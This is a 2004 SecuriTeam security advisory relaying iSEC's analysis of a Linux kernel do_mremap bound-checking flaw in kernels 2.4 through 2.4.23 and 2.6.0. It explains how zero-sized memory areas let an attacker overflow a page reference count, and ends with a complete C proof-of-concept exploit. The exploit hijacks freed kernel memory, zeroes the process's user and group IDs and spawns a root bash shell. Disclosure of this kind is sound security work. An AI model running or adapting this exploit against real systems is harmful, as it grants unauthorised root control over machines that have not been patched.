[UNIX] Linux Kernel do_mremap Local Privilege Escalation Vulnerability (Technical Details)
From: SecuriTeam (support_at_securiteam.com)
Date: 01/15/04
- Previous message: SecuriTeam: "[NEWS] payShield Library Bad Requests Verification"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 15 Jan 2004 18:09:40 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux Kernel do_mremap Local Privilege Escalation Vulnerability (Technical
Details)
------------------------------------------------------------------------
SUMMARY
A critical security vulnerability has been found in the Linux kernel
memory management code in mremap(2) system call due to incorrect bound
checks. The following advisory will try to shed more light into the issue,
and provide a more accurate means of testing this vulnerability (via an
exploit).
DETAILS
Vulnerable systems:
* Linux kernel 2.4 up to 2.4.23 and 2.6.0
The mremap system call provides functionality of resizing (shrinking or
growing) as well as moving across process's addressable space of existing
virtual memory areas (VMAs) or any of its parts.
A typical VMA covers at least one memory page (which is exactly 4kB on the
i386 architecture). An incorrect bound check discovered inside the
do_mremap() kernel code performing remapping of a virtual memory area may
lead to creation of a virtual memory area of 0 bytes in length.
The problem bases on the general mremap flaw that remapping of 2 pages
from inside a VMA creates a memory hole of only one page in length but
also an additional VMA of two pages. In the case of a zero sized remapping
request no VMA hole is created but an additional VMA descriptor of 0 bytes
in length is created.
Such a malicious virtual memory area may disrupt the operation of the
other parts of the kernel memory management subroutines finally leading to
unexpected behavior.
A typical process's memory layout showing invalid VMA created with mremap
system call:
08048000-0804c000 r-xp 00000000 03:05 959142 /tmp/test
0804c000-0804d000 rw-p 00003000 03:05 959142 /tmp/test
0804d000-0804e000 rwxp 00000000 00:00 0
40000000-40014000 r-xp 00000000 03:05 1544523 /lib/ld-2.3.2.so
40014000-40015000 rw-p 00013000 03:05 1544523 /lib/ld-2.3.2.so
40015000-40016000 rw-p 00000000 00:00 0
4002c000-40158000 r-xp 00000000 03:05 1544529 /lib/libc.so.6
40158000-4015d000 rw-p 0012b000 03:05 1544529 /lib/libc.so.6
4015d000-4015f000 rw-p 00000000 00:00 0
[*] 60000000-60000000 rwxp 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0
The broken VMA in the above example has been marked with a [*].
Exploitation:
The iSEC team has identified multiple attack vectors for the bug
discovered. In this section, we want to describe the page counter method
however, we strongly believe that a much faster and more convenient method
exists.
As mentioned above a VMA of 0 bytes in size can be introduced into the
process's virtual memory list. Its unusual size renders such a VMA
partially invisible to the kernel main VM helper routine called
find_vma(). The find_vma(ADDR) function returns the first VMA descriptor
(START, END) from the current process's list satysfying ADDR < END or NULL
if none. Obviously, given a VMA starting and ending at the same address
ADDR the condition is violated if one searches for ADDR's VMA thus the
next VMA in the list will be returned.
The mremap() code calls the insert_vm_struct() helper function after
creating the bogus VMA descriptor in kernel memory which in turn checks
the new location calling the find_vma() helper which returns the wrong
result if a zero sized VMA is already present in the new location.
Therefore, it is possible to introduce multiple bogus VMA descriptors for
the same virtual memory address. This happens only if the adjacent zero
sized VMAs differ in their descriptor flags because otherwise they will be
linked together in insert_vm_struct().
Later the process virtual memory list could look like:
08048000-080a2000 r-xp 00000000 03:02 53159 /tmp/test
080a2000-080a5000 rw-p 00059000 03:02 53159 /tmp/test
080a5000-080a6000 rwxp 00000000 00:00 0
40000000-40001000 r--p 00000000 00:00 0
60000000-60000000 r--p 00000000 00:00 0
60000000-60000000 rw-p 00000000 00:00 0
60000000-60000000 r--p 00000000 00:00 0
60000000-60001000 rwxp 00000000 00:00 0
bffff000-c0000000 rwxp 00000000 00:00 0
Further we have found that there is an off-by-one increment inside the
copy_page_range() function for the page counter of the first VMA page
directly following a zero sized VMA area. This is not a bug in the
copy_page_range code(), it is just a feature for a combined zero and
non-zero VMA. The copy_page_range function is called on fork() to copy
parent's page tables into the child process.
Moreover, we must note that it is possible to remove a zero-sized VMA from
the virtual memory list if another suitable VMA is mapped directly below
the starting address of the 0-VMA. Suitable means that the new VMA must
have exactly the same attributes (read, exec, etc) as the following
zero-sized VMA and do not map a file. This again is a feature of the
mmap() system call which will try to minimize the number of used VMA
descriptors merging them if possible. Note that merging the VMAs does not
influence any page counters in following VMAs.
Combining the findings above we conclude that it is possible to
arbitrarily increment the page counter of the first VMA page by forking
more and more a process with a zero-sized VMA 'sandwich'. Cleanup must be
done in the child before it can exit() otherwise the kernel would print a
nasty error message while trying to remove the bogus VMA mappings.
The goal is to overflow the page counter to become 1 again in the child
process. If the corresponding VMA is unmapped now, the page counter will
become 0 and the page returned to the kernel memory management. Note that
the parent will still hold a reference to the freed page in its page table
thus making a manipulation of kernel memory possible.
Let us take a closer look at the incrementing of the page counter. We can
introduce M (marked with A's and B's) 0-sized VMAs directly before the
victim VMA hosting the page we want the counter to overflow. If the victim
maps anonymous memory, the first write access to the victim VMA page
(marked with P) will allocate and insert a fresh page frame into the
process's page table and the page counter will be set to 1:
[A][B][A][B] ... [A][P VICTIM ]
After the first fork() P's page counter will become 1 + M + 1 where the
first one is for the original copy in the parent, M for the bogus VMAs and
one for the copy in the child. Cleaning up the 0-VMAs in the child will
not change the page counter however, it will be decremented by one on
child's exit. Thus after the first fork()-exit() pair it will become 1 +
M. We can conclude for N forks taking integer overflows into account that
without the final exit() call in the child following equation holds:
1 + M*N + 1 = 1
Or that
M*N = 2^32-1 = 3 * 5 * 17 * 257 * 65537
Thus we can for example choose to create (3*5*257) 0-sized VMAs and fork
the parent (17*65537) times to overflow P's page counter. This may be a
quite longish task. Times ranging from about one hour on a fast machine to
more than 10 hours have been observed.
Further exploitation proves to be easy because the kernel page management
has the nice property to use a kind of reversed LRU policy for page
allocation. That means that if a page has been released to the kernel MM
subsystem it will be returned on a subsequent allocation request. The
released page could be for example allocated to a file mapping we can
normally only read from or to kernel structures, etc.
It is worth noting that the parent's page reference (PTE) must be
unprotected before we can use it to modify page contents because fork()
will mark it as read only (for copy-on-write reasons).
Impact:
Since no special privileges are required to use the mremap(2) system call
any process may misuse its unexpected behavior to disrupt the kernel
memory management subsystem. Proper exploitation of this vulnerability may
lead to local privilege escalation including execution of arbitrary code
with kernel level access. Proof-of-concept exploit code has been created
and successfully tested giving UID 0 shell on vulnerable systems.
All users are encouraged to patch all vulnerable systems as soon as
appropriate vendor patches are released.
Exploit:
/*
* Linux kernel mremap() bound checking bug exploit.
*
* Bug found by Paul Starzetz <paul@isec.pl>
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <asm/page.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define str(s) #s
#define xstr(s) str(s)
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR 0x2000
#define RNDINT 512
#define NUMVMA (3 * 5 * 257)
#define NUMFORK (17 * 65537)
#define DUPTO 1000
#define TMPLEN 256
#define __NR_sys_mremap 163
_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
unsigned long new_len,
unsigned long flags, unsigned long new_addr);
static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy =
0, uid, gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];
void fatal(const char * msg)
{
printf("\n");
if (!errno) {
fprintf(stderr, "FATAL: %s\n", msg);
} else {
perror(msg);
}
printf("\nentering endless loop");
fflush(stdout);
fflush(stderr);
while (1) pause();
}
void kernel_code(void * file, loff_t offset, int origin)
{
int i, c;
int *v;
if (!file)
goto out;
__asm__("movl %%esp, %0" : : "m" (c));
c &= 0xffffe000;
v = (void *) c;
for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
if (v[i] == uid && v[i+1] == uid) {
i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
}
if (v[i] == gid) {
v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
break;
}
}
out:
dummy++;
}
void try_to_exploit(void)
{
int v = 0;
v += fops[0];
v += fake_file[0];
kernel_code(0, 0, v);
lseek(DUPTO, 0, SEEK_SET);
if (geteuid()) {
printf("\nFAILED uid!=0"); fflush(stdout);
errno =- ENOSYS;
fatal("uid change");
}
printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);
kill(ppid, SIGUSR1);
setresuid(0, 0, 0);
sleep(1);
printf("\n\n"); fflush(stdout);
execl("/bin/bash", "bash", NULL);
fatal("burp");
}
void cleanup(int v)
{
victim[DUPTO] = victim[0];
kill(0, SIGUSR2);
}
void redirect_filp(int v)
{
printf("\n[!] parent check race... "); fflush(stdout);
if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
printf("SUCCESS, cought SLAB page!"); fflush(stdout);
victim[DUPTO] = (unsigned) & fake_file;
signal(SIGUSR1, &cleanup);
kill(pid, SIGUSR1);
} else {
printf("FAILED!");
}
fflush(stdout);
}
int get_slab_objs(void)
{
FILE * fp;
int c, d, u = 0, a = 0;
static char line[TMPLEN], name[TMPLEN];
fp = fopen("/proc/slabinfo", "r");
if (!fp)
fatal("fopen");
fgets(name, sizeof(name) - 1, fp);
do {
c = u = a =- 1;
if (!fgets(line, sizeof(line) - 1, fp))
break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d,
&d);
} while (strcmp(name, "size-4096"));
fclose(fp);
return c == 7 ? a - u : -1;
}
void unprotect(int v)
{
int n, c = 1;
*victim = 0;
printf("\n[+] parent unprotected PTE "); fflush(stdout);
dup2(0, 2);
while (1) {
n = get_slab_objs();
if (n < 0)
fatal("read slabinfo");
if (n > 0) {
printf("\n depopulate SLAB #%d", c++);
blah = 0; kill(hpid, SIGUSR1);
while (!blah) pause();
}
if (!n) {
blah = 0; kill(hpid, SIGUSR1);
while (!blah) pause();
dup2(0, DUPTO);
break;
}
}
signal(SIGUSR1, &redirect_filp);
kill(pid, SIGUSR1);
}
void cleanup_vmas(void)
{
int i = NUMVMA;
while (1) {
tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
fatal("unmap1");
}
i--;
if (!i)
break;
tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE,
PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
fatal("unmap2");
}
i--;
if (!i)
break;
}
}
void catchme(int v)
{
blah++;
}
void exitme(int v)
{
_exit(0);
}
void childrip(int v)
{
waitpid(-1, 0, WNOHANG);
}
void slab_helper(void)
{
signal(SIGUSR1, &catchme);
signal(SIGUSR2, &exitme);
blah = 0;
while (1) {
while (!blah) pause();
blah = 0;
if (!fork()) {
dup2(0, DUPTO);
kill(getppid(), SIGUSR1);
while (1) pause();
} else {
while (!blah) pause();
blah = 0; kill(ppid, SIGUSR2);
}
}
exit(0);
}
int main(void)
{
int i, r, v, cnt;
time_t start;
srand(time(NULL) + getpid());
ppid = getpid();
uid = getuid();
gid = getgid();
hpid = fork();
if (!hpid)
slab_helper();
fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (fops == MAP_FAILED)
fatal("mmap fops VMA");
for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
fops[i] = (unsigned)&kernel_code;
for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
fake_file[i] = (unsigned)fops;
vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (vma_ro == MAP_FAILED)
fatal("mmap1");
vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (vma_rw == MAP_FAILED)
fatal("mmap2");
cnt = NUMVMA;
while (1) {
r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE,
PAGEADDR);
if (r == (-1)) {
printf("\n[-] ERROR remapping"); fflush(stdout);
fatal("remap1");
}
cnt--;
if (!cnt) break;
r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE,
PAGEADDR);
if (r == (-1)) {
printf("\n[-] ERROR remapping"); fflush(stdout);
fatal("remap2");
}
cnt--;
if (!cnt) break;
}
victim = mmap((void*)PAGEADDR, PAGE_SIZE,
PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if (victim != (void *) PAGEADDR)
fatal("mmap victim VMA");
v = *victim;
*victim = v + 1;
signal(SIGUSR1, &unprotect);
signal(SIGUSR2, &catchme);
signal(SIGCHLD, &childrip);
printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
start = time(NULL);
cnt = NUMFORK;
v = 0;
while (1) {
cnt--;
v--;
dummy += *victim;
if (cnt > 1) {
__asm__(
"pusha \n"
"movl %1, %%eax \n"
"movl $("xstr(CLONEFL)"), %%ebx \n"
"movl %%esp, %%ecx \n"
"movl $120, %%eax \n"
"int $0x80 \n"
"movl %%eax, %0 \n"
"popa \n"
: : "m" (pid), "m" (dummy)
);
} else {
pid = fork();
}
if (pid) {
if (v <= 0 && cnt > 0) {
float eta, tm;
v = rand() % RNDINT / 2 + RNDINT / 2;
tm = eta = (float)(time(NULL) - start);
eta *= (float)NUMFORK;
eta /= (float)(NUMFORK - cnt);
printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ",
NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta -
tm);
fflush(stdout);
}
if (cnt) {
waitpid(pid, 0, 0);
continue;
}
if (!cnt) {
while (1) {
r = wait(NULL);
if (r == pid) {
cleanup_vmas();
while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
}
}
}
}
else {
cleanup_vmas();
if (cnt > 0) {
_exit(0);
}
printf("\n[+] overflow done, the moment of truth...");
fflush(stdout);
sleep(1);
signal(SIGUSR1, &catchme);
munmap(0, PAGE_SIZE);
dup2(0, 2);
blah = 0; kill(ppid, SIGUSR1);
while (!blah) pause();
munmap((void *)victim, PAGE_SIZE);
dup2(0, DUPTO);
blah = 0; kill(ppid, SIGUSR1);
while (!blah) pause();
try_to_exploit();
while (1) pause();
}
}
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:ihaquer@isec.pl> Paul
Starzetz.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] payShield Library Bad Requests Verification"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [Full-Disclosure] Re: Second critical mremap() bug found in all Linux kernels
... > A critical security vulnerability has been found in the Linux kernel ...
> memory management code inside the mremapsystem call due to missing ... > Every
VMA in the list corresponds to a part of the process's page table. ... (Full-Disclosure) - Re: Second critical mremap() bug found in all Linux kernels
... > A critical security vulnerability has been found in the Linux kernel ...
> memory management code inside the mremapsystem call due to missing ... > Every
VMA in the list corresponds to a part of the process's page table. ... (Bugtraq) - Re: Second critical mremap() bug found in all Linux kernels
... > A critical security vulnerability has been found in the Linux kernel ...
> memory management code inside the mremapsystem call due to missing ... > Every
VMA in the list corresponds to a part of the process's page table. ... (Full-Disclosure) - Linux kernel mremap() bug update
... Linux kernel do_mremap local privilege escalation vulnerability ... virtual
memory areas or any of its parts. ... A typical VMA covers at least one memory page
(which is exactly 4kB on ... (Bugtraq) - Kernel Vulnerability
... Linux kernel do_mremap VMA limit local privilege escalation ... A critical
security vulnerability has been found in the Linux kernel memory ... The corresponding
page table entries (PTEs) have been marked with o and x: ... (comp.os.linux.security)